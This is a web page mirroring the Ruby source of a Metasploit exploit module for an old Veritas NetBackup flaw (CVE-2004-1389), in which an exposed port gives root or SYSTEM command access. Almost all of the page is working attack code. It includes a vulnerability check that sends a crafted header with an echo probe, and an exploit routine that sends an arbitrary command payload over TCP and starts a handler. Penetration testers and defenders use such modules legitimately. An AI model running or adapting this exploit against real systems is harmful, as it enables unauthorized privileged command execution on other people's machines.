CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'VERITAS NetBackup Remote Command Execution',

14
      'Description'    => %q{

15
          This module allows arbitrary command execution on an

16
        ephemeral port opened by Veritas NetBackup, whilst an

17
        administrator is authenticated. The port is opened and

18
        allows direct console access as root or SYSTEM from

19
        any source address.

20
      },

21
      'Author'         => [ 'aushack' ],

22
      'License'        => MSF_LICENSE,

23
      'References'     =>

24
        [

25
          [ 'CVE', '2004-1389' ],

26
          [ 'OSVDB', '11026' ],

27
          [ 'BID', '11494' ]

28
        ],

29
      'Privileged'     => true,

30
      'Platform'       => %w{ linux unix win },

31
      'Arch'           => ARCH_CMD,

32
      'Payload'        =>

33
        {

34
          'Space'    => 1024,

35
          'BadChars' => '',

36
          'DisableNops' => true,

37
          'Compat'      =>

38
            {

39
              'PayloadType' => 'cmd',

40
              'RequiredCmd' => 'generic perl telnet',

41
            }

42
        },

43
      'Targets'        =>

44
        [

45
          ['Automatic', { }],

46
        ],

47
      'DisclosureDate' => '2004-10-21',

48
      'DefaultTarget' => 0))

49
  end

50


51
  def check

52
    connect

53


54
    sploit = rand_text_alphanumeric(10)

55
    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"

56


57
    sock.put(buf)

58
    banner = sock.get_once

59


60
    disconnect

61


62
    if banner.to_s.index(sploit)

63
      return Exploit::CheckCode::Vulnerable

64
    end

65
    return Exploit::CheckCode::Safe

66
  end

67


68
  def exploit

69
    connect

70


71
    sploit = payload.encoded.split(" ")

72


73
    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"

74
    buf << payload.encoded

75
    buf << "\n"

76


77
    sock.put(buf)

78
    res = sock.get_once

79


80
    print_status(res.to_s)

81


82
    handler

83
    disconnect

84
  end

85
end

86


87